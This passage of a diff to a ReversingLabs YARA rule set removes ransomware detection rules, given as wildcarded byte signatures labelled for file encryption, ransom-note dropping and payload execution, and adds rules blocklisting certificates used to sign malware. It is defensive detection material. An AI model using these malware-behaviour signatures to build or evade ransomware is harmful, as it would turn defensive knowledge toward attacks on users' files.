-            ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
-            8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59
-            59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$generate_strings_to_encrypt = {
-            0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D
-            85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
-            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
-            ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ??
-            ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $generate_strings_to_encrypt and $encrypt_file and $server_communication and $exec_payload ) or ( $encrypt_file and $server_communication_1 and $copy_payload ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "24:af:70:b5:d1:7a:63:ad:05:3e:58:21" and 1474179615 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Albabat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_402E9Fcba61E5Eaf9C0C7B3Bfd6259D9 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Albabat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "11941c0d-45fb-5746-bbad-f43f336d4b1d"
-		date = "2024-03-18"
-		modified = "2024-03-18"
+		id = "a24e1201-4a90-5d0f-ac19-4d88a4e4cfe5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Albabat.yara#L1-L139"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "38ec8388b9006f6ab9a397858b89f4bfd7def2ffcf525cfc736abae49bc6034a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13294-L13310"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1bfc2610745a98ebcf0f77504815d9d1c448697fbe407d6c2e075219b401de50"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Albabat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C7 83 ??
-            ?? ?? ?? ?? ?? ?? ?? 66 C7 83 ?? ?? 00 00 ?? ?? C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 57
-            F6 0F 11 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? C6 83 ?? ?? ?? ?? ?? 4C 8D
-            83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 D7 48 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D
-            ?? ?? ?? ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48
-            89 05 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ??
-            ?? 48 89 C6 48 89 38 4C 8D 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7
-            83 ?? ?? ?? ?? ?? ?? ?? ?? 0F 11 B3 ?? ?? ?? ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 C6 48
-            89 D7 48 85 C0 74 ?? 48 85 FF 0F 85 ?? ?? ?? ?? 48 89 7C 24 ?? 48 8D 8B ?? ?? ?? ??
-            48 8D 93 ?? ?? ?? ?? 4C 8D 83 ?? ?? ?? ?? 49 89 F1 E8 ?? ?? ?? ?? 48 83 BB ?? ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 48 8B BB ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
-            ?? 48 85 C9 75 ?? FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C1 48 89 05 ??
-            ?? ?? ?? 41 B8 ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89
-        }
-		$encrypt_files_p2 = {
-            C6 48 89 38 4C 8D 35 ?? ?? ?? ?? 48 83 BB ?? ?? ?? ?? ?? 74 ?? 4C 8B 83 ?? ?? ?? ??
-            48 8B 0D ?? ?? ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8B 8B ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            48 85 F6 0F 84 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D B3 ?? ??
-            ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 8D 3D ?? ?? ?? ?? 4C 89 BB ?? ?? ?? ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
-            ?? ?? ?? 48 8D BB ?? ?? ?? ?? 48 89 BB ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ??
-            48 8D 8B ?? ?? ?? ?? 48 8D 93 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B3 ?? ?? ?? ?? 48 8B
-            93 ?? ?? ?? ?? 4C 8B A3 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 48 8B 0D
-            ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 4C 89 B3 ?? ?? ?? ?? 4C 89 BB ?? ?? ??
-            ?? 48 8D 05 ?? ?? ?? ?? 48 89 83 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
-            35 ?? ?? ?? ?? 48 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D B3 ?? ??
-            ?? ?? 4C 89 B3 ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 83 ?? ?? ?? ?? ??
-            ?? ?? ?? 48 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ??
-            ?? ?? 48 83 F8 ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 65 48 8B
-            14 25 ?? ?? ?? ?? 48 8B 0C CA 48 8D 89 ?? ?? ?? ?? 48 39 C8 75 ?? 8B 05 ?? ?? ?? ??
-            FF C0 75 ?? 48 8D 0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-        }
-		$drop_ransom_note = {
-            48 8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48
-            89 B4 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 48
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 4C 8B 84 24 ?? ?? ?? ?? 48 8B 0D ?? ??
-            ?? ?? 31 D2 FF 15 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89
-            F1 E8 ?? ?? ?? ?? 48 85 C0 4C 8B 74 24 ?? 74 ?? 48 89 C5 4C 8B 6C 24 ?? E9 ?? ?? ??
-            ?? 4D 8D 0C D1 49 83 C1 ?? 48 C1 E2 ?? 48 F7 DA 4F 8D 14 C2 49 83 C2 ?? 49 C1 E0 ??
-            49 F7 D8 45 31 DB 4C 39 DA 0F 84 ?? ?? ?? ?? 4D 39 D8 0F 84 ?? ?? ?? ?? 4B 8B 34 19
-            4F 8B 34 1A 4C 39 F6 0F 82 ?? ?? ?? ?? 49 83 C3 ?? 4C 39 F6 76 ?? E9 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24
-            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 4C
-            8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48
-            C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 4C 89 F2 E8 ??
-            ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F0 FF 15
-            ?? ?? ?? ?? 48 85 ED 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48
-            8D 9C 24 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ??
-            ?? 41 B8 ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 0F 10 00 0F 11 84 24 ?? ?? ?? ?? 48 8B
-            8C 24 ?? ?? ?? ?? 48 85 C9 74
-        }
-		$change_desktop_wallpaper = {
-            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
-            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 F6 74
-            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 25 ?? ?? ?? ?? 48 85 C0 4C
-            8B 74 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 41 B8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B B4 24 ?? ??
-            ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C
-            8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 F2 E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ??
-            ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ?? ?? ?? ?? ?? 74 ?? 48 8B 0D
-            ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B B4 24 ??
-            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA 4D 89 F0 E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ??
-            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 89 C1 83 E1 ?? 83 F9 ?? 0F 85 ?? ??
-            ?? ?? 48 8D 58 ?? 4C 8B 70 ?? 48 8B 68 ?? 4C 89 F1 FF 55
-        }
-		$find_files_p1 = {
-            4C 8D 0D ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 DA E8 ?? ?? ?? ?? 48 83 BC 24 ??
-            ?? ?? ?? ?? 74 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 D8 FF 15 ?? ?? ?? ?? 4D 85 FF 74
-            ?? 48 8B 0D ?? ?? ?? ?? 31 D2 49 89 F0 FF 15 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 66 0F EF C0 F3 0F 7F 84 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C5 4C 8B 6C 24 ?? 4C 8B
-            74 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 8B
-            84 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 29 E8 48 39 F0 72 ?? 48 8B 8C 24 ?? ??
-            ?? ?? 48 01 E9 31 D2 49 89 F0 E8 ?? ?? ?? ?? 48 01 F5 48 89 AC 24 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 48 C1 ED ?? 74 ?? 41 BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 83 FF ?? 72 ?? 48 85
-            DB 74 ?? 48 8B 84 24 ?? ?? ?? ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 EA 49 89 F0 E8
-            ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? EB ?? 4C 89 FB 4C 89 F0 4D 85 FF 74 ?? 49 89 DC
-            48 8B 44 D8 ?? 48 85 C0 74 ?? 48 0F BD C0 48 83 F0 ?? EB ?? 45 31 E4 EB ?? B8 ?? ??
-            ?? ?? 49 C1 E4 ?? 49 83 CC ?? 49 29 C4 49 C1 EC ?? 48 8B B4 24 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 F1 45 31 C0 E8 ?? ?? ?? ?? 48 89 F1 E8 ?? ?? ?? ?? 49 89 C7 49 83 FC
-        }
-		$find_files_p2 = {
-            73 ?? 48 8B 0D ?? ?? ?? ?? 31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? E9 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E1 E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 68
-            ?? 49 8D 5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 EA 48 89 44 24 ?? E8 ?? ?? ?? ?? 48
-            8B 44 24 ?? F3 41 0F 6F 07 41 0F 10 4F ?? 0F 11 48 ?? F3 0F 7F 40 ?? 49 8D 4C 24 ??
-            48 39 D9 0F 83 ?? ?? ?? ?? 4D 89 E5 4C 8D 60 ?? 49 8D 4D ?? 43 C6 44 2C ?? ?? 48 39
-            CB 0F 82 ?? ?? ?? ?? 43 0F 11 74 2C ?? 43 0F 11 7C 2C ?? 48 C7 44 24 ?? ?? ?? ?? ??
-            4C 89 E1 48 89 DA 48 8B B4 24 ?? ?? ?? ?? 49 89 F0 49 89 E9 E8 ?? ?? ?? ?? 48 89 5C
-            24 ?? BA ?? ?? ?? ?? 48 89 E9 49 89 F0 4D 89 E1 E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
-            31 D2 4D 89 F8 FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E9 E8 ??
-            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 C3 48 8D B4 24 ?? ?? ?? ?? 48 89 C1 48 8B
-            54 24 ?? 4D 89 E8 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note ) and ( $change_desktop_wallpaper )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "40:2e:9f:cb:a6:1e:5e:af:9c:0c:7b:3b:fd:62:59:d9" and 1477440000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Awesomescott : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2C84F9136059E96134F8766670Eacd52 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AwesomeScott ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "36d3b801-dbdb-585a-ac80-1827a6749c87"
-		date = "2020-09-16"
-		modified = "2020-09-16"
+		id = "af7eb5ff-570f-5886-b550-3d327d05fabe"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.AwesomeScott.yara#L1-L101"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ed8096a4abbd015f79f4ec7239cd4070194ad70fa03da6714e499a41f9fb9423"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13312-L13328"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d6778630dcc3e4fe2816e6dee1b823e616f53de8a924057495c7c252948a71b4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AwesomeScott"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 83 EC ??
-            45 33 FF 4C 8B F2 49 8B D8 4C 89 78 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 4C
-            89 78 ?? 4C 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? B8 ?? ?? ?? ?? 48 8B F1 45 33 C9 44 8B
-            C0 8B D0 49 8B CE 45 32 ED 48 83 CD ?? 49 8B FF FF 15 ?? ?? ?? ?? 4C 8B E0 48 3B C5
-            75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8B CB 41 8D 51 ?? 45 8D 41 ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B E8 48 83 F8 ?? 75
-            ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 44 8B CB
-      }
-		$encrypt_files_p2 = {
-            44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ??
-            4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 8B CB 33 D2 C7 44 24 ?? ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 8D 44 24 ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 44 8B C0 45 33 C9 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B
-            44 24 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 41 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 41 B8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 DB 90 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 49 8B
-            CC 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ??
-            48 8B 4C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F B6 DB 0F 42 D8 48 8D 44 24
-            ?? 45 33 C9 48 89 44 24 ?? 44 0F B6 C3 33 D2 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
-      }
-		$encrypt_files_p3 = {
-            74 ?? 44 8B 44 24 ?? 4C 8D 4C 24 ?? 48 8B D7 48 8B CD 4C 89 7C 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 84 DB 0F 84 ?? ?? ?? ?? 41 B5 ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 44 8B C0 48 8B CE E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 49 8B CC FF 15 ?? ??
-            ?? ?? 48 85 ED 74 ?? 48 8B CD FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF E8 ?? ?? ??
-            ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B
-            D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 8B
-            4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ??
-            ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
-            ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 48 8B 4C 24
-        }
-		$find_files = {
-            E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 F6 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ??
-            ?? 00 00 E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15
-            ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 4C 8D 44
-            24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
